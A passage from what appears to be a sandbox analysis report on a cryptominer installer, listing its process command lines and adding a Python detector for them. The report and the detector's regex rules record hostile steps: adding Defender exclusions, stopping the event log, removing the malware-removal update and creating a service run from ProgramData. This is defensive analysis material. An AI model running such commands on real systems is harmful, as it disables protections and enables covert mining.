                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                Imagebase:0x7ff794000000
                                                                File size:96'256 bytes
                                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:30
                                                                Start time:19:38:14
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:31
                                                                Start time:19:38:14
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\powercfg.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                Imagebase:0x7ff794000000
                                                                File size:96'256 bytes
                                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:32
                                                                Start time:19:38:14
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:33
                                                                Start time:19:38:14
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\powercfg.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                Imagebase:0x7ff794000000
                                                                File size:96'256 bytes
                                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:34
                                                                Start time:19:38:14
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:35
                                                                Start time:19:38:14
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                Target ID:36
                                                                Start time:19:38:14
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:37
                                                                Start time:19:38:14
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\explorer.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:explorer.exe
                                                                Imagebase:0x7ff72b770000
                                                                File size:5'141'208 bytes
                                                                MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000025.00000002.4209894132.0000000000F55000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000025.00000002.4209894132.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000025.00000003.2762941165.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000025.00000002.4209894132.0000000000F70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000025.00000002.4210361767.0000000001A00000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                Has exited:false

                                                                Target ID:38
                                                                Start time:19:38:14
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\wusa.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                Imagebase:0x7ff61aa00000
                                                                File size:345'088 bytes
                                                                MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

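The process list above (Target IDs 16 through 38) records the full set-up sequence of this sample: `wusa /uninstall /kb:890830` (removal of the Malicious Software Removal Tool update), `sc create` of a service whose binary lives under `C:\ProgramData`, `sc stop eventlog`, `powercfg /x` zeroing the standby and hibernate timeouts, and an `Add-MpPreference` call excluding the user profile, `ProgramData` and every `.exe` from Defender scanning. The following detector is an added example and is not part of the Joe Sandbox report: it runs rules modelled on the signatures the report cites ("Disable power options", "Stop EventLog", "Powershell Base64 Encoded MpPreference Cmdlet") over process-creation command lines. The sample events are constructed copies of the Commandline fields above; the rule names, the `-EncodedCommand` unwrapping and the base64-encoded event are my own additions, included because the report's Sigma rule targets the encoded variant even though this sample passed the cmdlet in clear text.

```python
"""Flag the evasion and persistence command lines seen in this report.

Added example, not Joe Sandbox output. SAMPLE_EVENTS is constructed from the
Commandline fields in the report; the rules and helper names are assumptions
of this example, not a published rule set.
"""
import base64
import re
from dataclasses import dataclass


@dataclass
class Hit:
    technique: str
    cmdline: str


# Constructed copies of the Commandline fields in the report (Targets 16-38).
SAMPLE_EVENTS = [
    'C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1',
    'wusa /uninstall /kb:890830 /quiet /norestart',
    'C:\\Windows\\system32\\sc.exe create "OAQXWXCL" binpath= '
    '"C:\\ProgramData\\pcjszeyeitsp\\kgpcbqezuufy.exe" start= "auto"',
    'C:\\Windows\\system32\\sc.exe stop eventlog',
    'C:\\Windows\\system32\\sc.exe start "OAQXWXCL"',
    "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) "
    "-ExclusionExtension '.exe' -Force",
    'C:\\Windows\\system32\\powercfg.exe /x -hibernate-timeout-ac 0',
    'C:\\Windows\\system32\\powercfg.exe /x -standby-timeout-dc 0',
    'explorer.exe',
]

# Constructed event for the encoded variant: PowerShell -EncodedCommand takes
# base64 of the UTF-16LE script text, so the cmdlet never appears in clear.
ENCODED_EVENT = "powershell.exe -NoP -EncodedCommand " + base64.b64encode(
    "Add-MpPreference -ExclusionPath $env:ProgramData".encode("utf-16-le")
).decode("ascii")

# Rule names are this example's own; patterns are anchored on the exact
# argument shapes recorded in the report, case-insensitive.
RULES = [
    ("defender_exclusion",
     re.compile(r"Add-MpPreference\b.*-Exclusion(Path|Extension|Process)", re.I)),
    ("eventlog_stop",
     re.compile(r"\bsc(\.exe)?\s+stop\s+eventlog\b", re.I)),
    ("msrt_removal",
     re.compile(r"\bwusa(\.exe)?\s+/uninstall\s+/kb:890830\b", re.I)),
    ("power_timeout_zeroed",
     re.compile(r"\bpowercfg(\.exe)?\s+/x\s+-(standby|hibernate)-timeout-(ac|dc)\s+0\b", re.I)),
    ("service_from_programdata",
     re.compile(r'\bsc(\.exe)?\s+create\s+\S+\s+binpath=\s*"?[A-Z]:\\ProgramData\\', re.I)),
]

# Matches -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
_ENCODED_ARG = re.compile(r"-e(?:nc|ncodedcommand|c)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def normalize(cmdline: str) -> str:
    """Append the decoded script when the command line carries -EncodedCommand.

    The raw line is kept so rules still see the host process and switches.
    Undecodable blobs are ignored rather than raising.
    """
    match = _ENCODED_ARG.search(cmdline)
    if not match:
        return cmdline
    try:
        decoded = base64.b64decode(match.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline
    return cmdline + " " + decoded


def scan(events):
    """Return one Hit per (rule, event) pair that matches."""
    hits = []
    for raw in events:
        cmd = normalize(raw)
        for name, pattern in RULES:
            if pattern.search(cmd):
                hits.append(Hit(name, raw))
    return hits


def techniques(events):
    """Sorted set of distinct rule names fired across the event list."""
    return sorted({hit.technique for hit in scan(events)})


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS + [ENCODED_EVENT]):
        print(f"{hit.technique:26} {hit.cmdline[:80]}")
```

Feed it the CommandLine field of Sysmon Event ID 1 or Security 4688 events. Any single rule firing is worth a look, but the combination seen here (service from `ProgramData`, event log stopped, Defender exclusions, sleep disabled) within a few seconds of one parent is the pattern that distinguishes a miner installer from an administrator's maintenance script; the `conhost.exe` and `explorer.exe` lines are included to show that benign lines produce no hits.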

                                                                  Execution Graph

                                                                  Execution Coverage:3.5%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:12.3%
                                                                  Total number of Nodes:1512
                                                                  Total number of Limit Nodes:2
execution_graph: node dump from the interactive graph widget, truncated in this extraction. Recoverable content: nodes are code addresses in the 7ff6e17d1140 to 7ff6e17d6648 range, and the API calls labelled on the graph are VirtualProtect, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, TlsGetValue, GetLastError, SetUnhandledExceptionFilter, Sleep, signal, _initterm, _amsg_exit, _cexit, malloc, free, strlen, memcpy, memset, wcslen, wcscpy, wcscat, _wcsnicmp and _wcsicmp.
2785->2777 2787 7ff6e17d6e1e 2789 7ff6e17d145e 2 API calls 2787->2789 2788 7ff6e17d57d1 3273 7ff6e17d14a9 2788->3273 2794 7ff6e17d6e2a 2789->2794 2793 7ff6e17d5c10 wcslen 2798 7ff6e17d5c26 2793->2798 2799 7ff6e17d5c6c 2793->2799 2794->2659 2795 7ff6e17d586d 2803 7ff6e17d145e 2 API calls 2795->2803 2796 7ff6e17d5b49 3478 7ff6e17d38e0 2796->3478 2797->2793 2800 7ff6e17d5c40 _wcsnicmp 2798->2800 2807 7ff6e17d5dd9 memset wcscpy wcscat 2799->2807 2800->2799 2804 7ff6e17d5c56 wcslen 2800->2804 2815 7ff6e17d5861 2803->2815 2804->2799 2804->2800 2810 7ff6e17d2f70 2 API calls 2807->2810 2808 7ff6e17d5855 2811 7ff6e17d145e 2 API calls 2808->2811 2809 7ff6e17d14c7 2 API calls 2812 7ff6e17d5ba5 2809->2812 2814 7ff6e17d5e30 2810->2814 2811->2815 2812->2797 2818 7ff6e17d145e 2 API calls 2812->2818 2817 7ff6e17d3350 11 API calls 2814->2817 3405 7ff6e17d3350 memset 2815->3405 2820 7ff6e17d5e48 2817->2820 2818->2797 2821 7ff6e17d14c7 2 API calls 2820->2821 2822 7ff6e17d5e76 memset 2821->2822 2825 7ff6e17d5e97 2822->2825 2823 7ff6e17d2df0 11 API calls 2833 7ff6e17d5945 2823->2833 2824 7ff6e17d58bc 2824->2823 2826 7ff6e17d5ee7 wcslen 2825->2826 2827 7ff6e17d5f37 wcscat memset 2826->2827 2828 7ff6e17d5ef9 2826->2828 2835 7ff6e17d5f71 2827->2835 2830 7ff6e17d5f10 _wcsnicmp 2828->2830 2830->2827 2832 7ff6e17d5f22 wcslen 2830->2832 2831 7ff6e17d2df0 11 API calls 2836 7ff6e17d4234 2831->2836 2832->2827 2832->2830 2833->2831 2834 7ff6e17d5fe1 wcscpy wcscat 2837 7ff6e17d6013 2834->2837 2835->2834 2836->2659 2838 7ff6e17d6d92 memcpy 2837->2838 2839 7ff6e17d6150 2837->2839 2838->2839 2840 7ff6e17d620f wcslen 2839->2840 2841 7ff6e17d153f 2 API calls 2840->2841 2842 7ff6e17d629a 2841->2842 2843 7ff6e17d145e 2 API calls 2842->2843 2844 7ff6e17d62ab 2843->2844 2845 7ff6e17d634a 2844->2845 2847 7ff6e17d2f70 2 API calls 2844->2847 2846 7ff6e17d145e 2 API calls 2845->2846 2846->2836 2848 7ff6e17d62d8 2847->2848 2849 7ff6e17d38e0 11 API calls 2848->2849 2850 7ff6e17d6304 2849->2850 2851 7ff6e17d14c7 
2 API calls 2850->2851 2852 7ff6e17d633c 2851->2852 2852->2845 2853 7ff6e17d145e 2 API calls 2852->2853 2853->2845 2857 7ff6e17d1bc2 2854->2857 2855 7ff6e17d1c04 memcpy 2855->2671 2857->2855 2858 7ff6e17d1c45 VirtualQuery 2857->2858 2859 7ff6e17d1cf4 2857->2859 2858->2859 2863 7ff6e17d1c72 2858->2863 2860 7ff6e17d1d23 GetLastError 2859->2860 2862 7ff6e17d1d37 2860->2862 2861 7ff6e17d1ca4 VirtualProtect 2861->2855 2861->2860 2863->2855 2863->2861 3501 7ff6e17d1394 2864->3501 2866 7ff6e17d154e 2867 7ff6e17d1394 2 API calls 2866->2867 2868 7ff6e17d155d 2867->2868 2869 7ff6e17d1394 2 API calls 2868->2869 2870 7ff6e17d156c 2869->2870 2871 7ff6e17d1394 2 API calls 2870->2871 2872 7ff6e17d157b 2871->2872 2873 7ff6e17d1394 2 API calls 2872->2873 2874 7ff6e17d158a 2873->2874 2875 7ff6e17d1394 2 API calls 2874->2875 2876 7ff6e17d1599 2875->2876 2877 7ff6e17d1394 2 API calls 2876->2877 2878 7ff6e17d15a8 2877->2878 2879 7ff6e17d1394 2 API calls 2878->2879 2880 7ff6e17d15b7 2879->2880 2881 7ff6e17d15c6 2880->2881 2882 7ff6e17d1394 2 API calls 2880->2882 2883 7ff6e17d1394 2 API calls 2881->2883 2882->2881 2884 7ff6e17d15d0 2883->2884 2885 7ff6e17d15d5 2884->2885 2886 7ff6e17d1394 2 API calls 2884->2886 2887 7ff6e17d1394 2 API calls 2885->2887 2886->2885 2888 7ff6e17d15df 2887->2888 2889 7ff6e17d15e4 2888->2889 2890 7ff6e17d1394 2 API calls 2888->2890 2891 7ff6e17d1394 2 API calls 2889->2891 2890->2889 2892 7ff6e17d15f3 2891->2892 2892->2836 2893 7ff6e17d1503 2892->2893 2894 7ff6e17d1394 2 API calls 2893->2894 2895 7ff6e17d150d 2894->2895 2896 7ff6e17d1394 2 API calls 2895->2896 2897 7ff6e17d1512 2896->2897 2898 7ff6e17d1394 2 API calls 2897->2898 2899 7ff6e17d1521 2898->2899 2900 7ff6e17d1394 2 API calls 2899->2900 2901 7ff6e17d1530 2900->2901 2902 7ff6e17d1394 2 API calls 2901->2902 2903 7ff6e17d153f 2902->2903 2904 7ff6e17d1394 2 API calls 2903->2904 2905 7ff6e17d154e 2904->2905 2906 7ff6e17d1394 2 API calls 2905->2906 2907 7ff6e17d155d 2906->2907 2908 7ff6e17d1394 2 API calls 
2907->2908 2909 7ff6e17d156c 2908->2909 2910 7ff6e17d1394 2 API calls 2909->2910 2911 7ff6e17d157b 2910->2911 2912 7ff6e17d1394 2 API calls 2911->2912 2913 7ff6e17d158a 2912->2913 2914 7ff6e17d1394 2 API calls 2913->2914 2915 7ff6e17d1599 2914->2915 2916 7ff6e17d1394 2 API calls 2915->2916 2917 7ff6e17d15a8 2916->2917 2918 7ff6e17d1394 2 API calls 2917->2918 2919 7ff6e17d15b7 2918->2919 2920 7ff6e17d15c6 2919->2920 2921 7ff6e17d1394 2 API calls 2919->2921 2922 7ff6e17d1394 2 API calls 2920->2922 2921->2920 2923 7ff6e17d15d0 2922->2923 2924 7ff6e17d15d5 2923->2924 2925 7ff6e17d1394 2 API calls 2923->2925 2926 7ff6e17d1394 2 API calls 2924->2926 2925->2924 2927 7ff6e17d15df 2926->2927 2928 7ff6e17d15e4 2927->2928 2929 7ff6e17d1394 2 API calls 2927->2929 2930 7ff6e17d1394 2 API calls 2928->2930 2929->2928 2931 7ff6e17d15f3 2930->2931 2931->2686 2932 7ff6e17d156c 2931->2932 2933 7ff6e17d1394 2 API calls 2932->2933 2934 7ff6e17d157b 2933->2934 2935 7ff6e17d1394 2 API calls 2934->2935 2936 7ff6e17d158a 2935->2936 2937 7ff6e17d1394 2 API calls 2936->2937 2938 7ff6e17d1599 2937->2938 2939 7ff6e17d1394 2 API calls 2938->2939 2940 7ff6e17d15a8 2939->2940 2941 7ff6e17d1394 2 API calls 2940->2941 2942 7ff6e17d15b7 2941->2942 2943 7ff6e17d15c6 2942->2943 2944 7ff6e17d1394 2 API calls 2942->2944 2945 7ff6e17d1394 2 API calls 2943->2945 2944->2943 2946 7ff6e17d15d0 2945->2946 2947 7ff6e17d15d5 2946->2947 2948 7ff6e17d1394 2 API calls 2946->2948 2949 7ff6e17d1394 2 API calls 2947->2949 2948->2947 2950 7ff6e17d15df 2949->2950 2951 7ff6e17d15e4 2950->2951 2952 7ff6e17d1394 2 API calls 2950->2952 2953 7ff6e17d1394 2 API calls 2951->2953 2952->2951 2954 7ff6e17d15f3 2953->2954 2954->2686 2955 7ff6e17d145e 2954->2955 2956 7ff6e17d1394 2 API calls 2955->2956 2957 7ff6e17d146d 2956->2957 2958 7ff6e17d1394 2 API calls 2957->2958 2959 7ff6e17d147c 2958->2959 2960 7ff6e17d1394 2 API calls 2959->2960 2961 7ff6e17d148b 2960->2961 2962 7ff6e17d1394 2 API calls 2961->2962 2963 7ff6e17d149a 
2962->2963 2964 7ff6e17d1394 2 API calls 2963->2964 2965 7ff6e17d14a9 2964->2965 2966 7ff6e17d14b8 2965->2966 2967 7ff6e17d1394 2 API calls 2965->2967 2968 7ff6e17d1394 2 API calls 2966->2968 2967->2966 2969 7ff6e17d14c2 2968->2969 2970 7ff6e17d14c7 2969->2970 2971 7ff6e17d1394 2 API calls 2969->2971 2972 7ff6e17d1394 2 API calls 2970->2972 2971->2970 2973 7ff6e17d14d6 2972->2973 2974 7ff6e17d1394 2 API calls 2973->2974 2975 7ff6e17d14e0 2974->2975 2976 7ff6e17d14e5 2975->2976 2977 7ff6e17d1394 2 API calls 2975->2977 2978 7ff6e17d1394 2 API calls 2976->2978 2977->2976 2979 7ff6e17d14ef 2978->2979 2980 7ff6e17d14f4 2979->2980 2981 7ff6e17d1394 2 API calls 2979->2981 2982 7ff6e17d1394 2 API calls 2980->2982 2981->2980 2983 7ff6e17d14fe 2982->2983 2984 7ff6e17d1503 2983->2984 2985 7ff6e17d1394 2 API calls 2983->2985 2986 7ff6e17d1394 2 API calls 2984->2986 2985->2984 2987 7ff6e17d150d 2986->2987 2988 7ff6e17d1394 2 API calls 2987->2988 2989 7ff6e17d1512 2988->2989 2990 7ff6e17d1394 2 API calls 2989->2990 2991 7ff6e17d1521 2990->2991 2992 7ff6e17d1394 2 API calls 2991->2992 2993 7ff6e17d1530 2992->2993 2994 7ff6e17d1394 2 API calls 2993->2994 2995 7ff6e17d153f 2994->2995 2996 7ff6e17d1394 2 API calls 2995->2996 2997 7ff6e17d154e 2996->2997 2998 7ff6e17d1394 2 API calls 2997->2998 2999 7ff6e17d155d 2998->2999 3000 7ff6e17d1394 2 API calls 2999->3000 3001 7ff6e17d156c 3000->3001 3002 7ff6e17d1394 2 API calls 3001->3002 3003 7ff6e17d157b 3002->3003 3004 7ff6e17d1394 2 API calls 3003->3004 3005 7ff6e17d158a 3004->3005 3006 7ff6e17d1394 2 API calls 3005->3006 3007 7ff6e17d1599 3006->3007 3008 7ff6e17d1394 2 API calls 3007->3008 3009 7ff6e17d15a8 3008->3009 3010 7ff6e17d1394 2 API calls 3009->3010 3011 7ff6e17d15b7 3010->3011 3012 7ff6e17d15c6 3011->3012 3013 7ff6e17d1394 2 API calls 3011->3013 3014 7ff6e17d1394 2 API calls 3012->3014 3013->3012 3015 7ff6e17d15d0 3014->3015 3016 7ff6e17d15d5 3015->3016 3017 7ff6e17d1394 2 API calls 3015->3017 3018 7ff6e17d1394 2 API calls 
3016->3018 3017->3016 3019 7ff6e17d15df 3018->3019 3020 7ff6e17d15e4 3019->3020 3021 7ff6e17d1394 2 API calls 3019->3021 3022 7ff6e17d1394 2 API calls 3020->3022 3021->3020 3023 7ff6e17d15f3 3022->3023 3023->2686 3505 7ff6e17d2660 3024->3505 3026 7ff6e17d2e00 memset 3035 7ff6e17d2e3c 3026->3035 3029 7ff6e17d145e 2 API calls 3030 7ff6e17d2f35 3029->3030 3031 7ff6e17d2f53 3030->3031 3540 7ff6e17d1512 3030->3540 3033 7ff6e17d145e 2 API calls 3031->3033 3034 7ff6e17d2f5d 3033->3034 3034->2836 3507 7ff6e17d2690 3035->3507 3037 7ff6e17d1394 2 API calls 3036->3037 3038 7ff6e17d147c 3037->3038 3039 7ff6e17d1394 2 API calls 3038->3039 3040 7ff6e17d148b 3039->3040 3041 7ff6e17d1394 2 API calls 3040->3041 3042 7ff6e17d149a 3041->3042 3043 7ff6e17d1394 2 API calls 3042->3043 3044 7ff6e17d14a9 3043->3044 3045 7ff6e17d14b8 3044->3045 3046 7ff6e17d1394 2 API calls 3044->3046 3047 7ff6e17d1394 2 API calls 3045->3047 3046->3045 3048 7ff6e17d14c2 3047->3048 3049 7ff6e17d14c7 3048->3049 3050 7ff6e17d1394 2 API calls 3048->3050 3051 7ff6e17d1394 2 API calls 3049->3051 3050->3049 3052 7ff6e17d14d6 3051->3052 3053 7ff6e17d1394 2 API calls 3052->3053 3054 7ff6e17d14e0 3053->3054 3055 7ff6e17d14e5 3054->3055 3056 7ff6e17d1394 2 API calls 3054->3056 3057 7ff6e17d1394 2 API calls 3055->3057 3056->3055 3058 7ff6e17d14ef 3057->3058 3059 7ff6e17d14f4 3058->3059 3060 7ff6e17d1394 2 API calls 3058->3060 3061 7ff6e17d1394 2 API calls 3059->3061 3060->3059 3062 7ff6e17d14fe 3061->3062 3063 7ff6e17d1503 3062->3063 3064 7ff6e17d1394 2 API calls 3062->3064 3065 7ff6e17d1394 2 API calls 3063->3065 3064->3063 3066 7ff6e17d150d 3065->3066 3067 7ff6e17d1394 2 API calls 3066->3067 3068 7ff6e17d1512 3067->3068 3069 7ff6e17d1394 2 API calls 3068->3069 3070 7ff6e17d1521 3069->3070 3071 7ff6e17d1394 2 API calls 3070->3071 3072 7ff6e17d1530 3071->3072 3073 7ff6e17d1394 2 API calls 3072->3073 3074 7ff6e17d153f 3073->3074 3075 7ff6e17d1394 2 API calls 3074->3075 3076 7ff6e17d154e 3075->3076 3077 7ff6e17d1394 2 
API calls 3076->3077 3078 7ff6e17d155d 3077->3078 3079 7ff6e17d1394 2 API calls 3078->3079 3080 7ff6e17d156c 3079->3080 3081 7ff6e17d1394 2 API calls 3080->3081 3082 7ff6e17d157b 3081->3082 3083 7ff6e17d1394 2 API calls 3082->3083 3084 7ff6e17d158a 3083->3084 3085 7ff6e17d1394 2 API calls 3084->3085 3086 7ff6e17d1599 3085->3086 3087 7ff6e17d1394 2 API calls 3086->3087 3088 7ff6e17d15a8 3087->3088 3089 7ff6e17d1394 2 API calls 3088->3089 3090 7ff6e17d15b7 3089->3090 3091 7ff6e17d15c6 3090->3091 3092 7ff6e17d1394 2 API calls 3090->3092 3093 7ff6e17d1394 2 API calls 3091->3093 3092->3091 3094 7ff6e17d15d0 3093->3094 3095 7ff6e17d15d5 3094->3095 3096 7ff6e17d1394 2 API calls 3094->3096 3097 7ff6e17d1394 2 API calls 3095->3097 3096->3095 3098 7ff6e17d15df 3097->3098 3099 7ff6e17d15e4 3098->3099 3100 7ff6e17d1394 2 API calls 3098->3100 3101 7ff6e17d1394 2 API calls 3099->3101 3100->3099 3102 7ff6e17d15f3 3101->3102 3102->2728 3103 7ff6e17d1404 3102->3103 3104 7ff6e17d1394 2 API calls 3103->3104 3105 7ff6e17d1413 3104->3105 3106 7ff6e17d1394 2 API calls 3105->3106 3107 7ff6e17d1422 3106->3107 3108 7ff6e17d1394 2 API calls 3107->3108 3109 7ff6e17d1431 3108->3109 3110 7ff6e17d1394 2 API calls 3109->3110 3111 7ff6e17d1440 3110->3111 3112 7ff6e17d1394 2 API calls 3111->3112 3113 7ff6e17d144f 3112->3113 3114 7ff6e17d1394 2 API calls 3113->3114 3115 7ff6e17d145e 3114->3115 3116 7ff6e17d1394 2 API calls 3115->3116 3117 7ff6e17d146d 3116->3117 3118 7ff6e17d1394 2 API calls 3117->3118 3119 7ff6e17d147c 3118->3119 3120 7ff6e17d1394 2 API calls 3119->3120 3121 7ff6e17d148b 3120->3121 3122 7ff6e17d1394 2 API calls 3121->3122 3123 7ff6e17d149a 3122->3123 3124 7ff6e17d1394 2 API calls 3123->3124 3125 7ff6e17d14a9 3124->3125 3126 7ff6e17d14b8 3125->3126 3127 7ff6e17d1394 2 API calls 3125->3127 3128 7ff6e17d1394 2 API calls 3126->3128 3127->3126 3129 7ff6e17d14c2 3128->3129 3130 7ff6e17d14c7 3129->3130 3131 7ff6e17d1394 2 API calls 3129->3131 3132 7ff6e17d1394 2 API calls 3130->3132 
3131->3130 3133 7ff6e17d14d6 3132->3133 3134 7ff6e17d1394 2 API calls 3133->3134 3135 7ff6e17d14e0 3134->3135 3136 7ff6e17d14e5 3135->3136 3137 7ff6e17d1394 2 API calls 3135->3137 3138 7ff6e17d1394 2 API calls 3136->3138 3137->3136 3139 7ff6e17d14ef 3138->3139 3140 7ff6e17d14f4 3139->3140 3141 7ff6e17d1394 2 API calls 3139->3141 3142 7ff6e17d1394 2 API calls 3140->3142 3141->3140 3143 7ff6e17d14fe 3142->3143 3144 7ff6e17d1503 3143->3144 3145 7ff6e17d1394 2 API calls 3143->3145 3146 7ff6e17d1394 2 API calls 3144->3146 3145->3144 3147 7ff6e17d150d 3146->3147 3148 7ff6e17d1394 2 API calls 3147->3148 3149 7ff6e17d1512 3148->3149 3150 7ff6e17d1394 2 API calls 3149->3150 3151 7ff6e17d1521 3150->3151 3152 7ff6e17d1394 2 API calls 3151->3152 3153 7ff6e17d1530 3152->3153 3154 7ff6e17d1394 2 API calls 3153->3154 3155 7ff6e17d153f 3154->3155 3156 7ff6e17d1394 2 API calls 3155->3156 3157 7ff6e17d154e 3156->3157 3158 7ff6e17d1394 2 API calls 3157->3158 3159 7ff6e17d155d 3158->3159 3160 7ff6e17d1394 2 API calls 3159->3160 3161 7ff6e17d156c 3160->3161 3162 7ff6e17d1394 2 API calls 3161->3162 3163 7ff6e17d157b 3162->3163 3164 7ff6e17d1394 2 API calls 3163->3164 3165 7ff6e17d158a 3164->3165 3166 7ff6e17d1394 2 API calls 3165->3166 3167 7ff6e17d1599 3166->3167 3168 7ff6e17d1394 2 API calls 3167->3168 3169 7ff6e17d15a8 3168->3169 3170 7ff6e17d1394 2 API calls 3169->3170 3171 7ff6e17d15b7 3170->3171 3172 7ff6e17d15c6 3171->3172 3173 7ff6e17d1394 2 API calls 3171->3173 3174 7ff6e17d1394 2 API calls 3172->3174 3173->3172 3175 7ff6e17d15d0 3174->3175 3176 7ff6e17d15d5 3175->3176 3177 7ff6e17d1394 2 API calls 3175->3177 3178 7ff6e17d1394 2 API calls 3176->3178 3177->3176 3179 7ff6e17d15df 3178->3179 3180 7ff6e17d15e4 3179->3180 3181 7ff6e17d1394 2 API calls 3179->3181 3182 7ff6e17d1394 2 API calls 3180->3182 3181->3180 3183 7ff6e17d15f3 3182->3183 3183->2732 3185 7ff6e17d1394 2 API calls 3184->3185 3186 7ff6e17d158a 3185->3186 3187 7ff6e17d1394 2 API calls 3186->3187 3188 7ff6e17d1599 
3187->3188 3189 7ff6e17d1394 2 API calls 3188->3189 3190 7ff6e17d15a8 3189->3190 3191 7ff6e17d1394 2 API calls 3190->3191 3192 7ff6e17d15b7 3191->3192 3193 7ff6e17d15c6 3192->3193 3194 7ff6e17d1394 2 API calls 3192->3194 3195 7ff6e17d1394 2 API calls 3193->3195 3194->3193 3196 7ff6e17d15d0 3195->3196 3197 7ff6e17d15d5 3196->3197 3198 7ff6e17d1394 2 API calls 3196->3198 3199 7ff6e17d1394 2 API calls 3197->3199 3198->3197 3200 7ff6e17d15df 3199->3200 3201 7ff6e17d15e4 3200->3201 3202 7ff6e17d1394 2 API calls 3200->3202 3203 7ff6e17d1394 2 API calls 3201->3203 3202->3201 3204 7ff6e17d15f3 3203->3204 3204->2741 3205 7ff6e17d158a 3204->3205 3206 7ff6e17d1394 2 API calls 3205->3206 3207 7ff6e17d1599 3206->3207 3208 7ff6e17d1394 2 API calls 3207->3208 3209 7ff6e17d15a8 3208->3209 3210 7ff6e17d1394 2 API calls 3209->3210 3211 7ff6e17d15b7 3210->3211 3212 7ff6e17d15c6 3211->3212 3213 7ff6e17d1394 2 API calls 3211->3213 3214 7ff6e17d1394 2 API calls 3212->3214 3213->3212 3215 7ff6e17d15d0 3214->3215 3216 7ff6e17d15d5 3215->3216 3217 7ff6e17d1394 2 API calls 3215->3217 3218 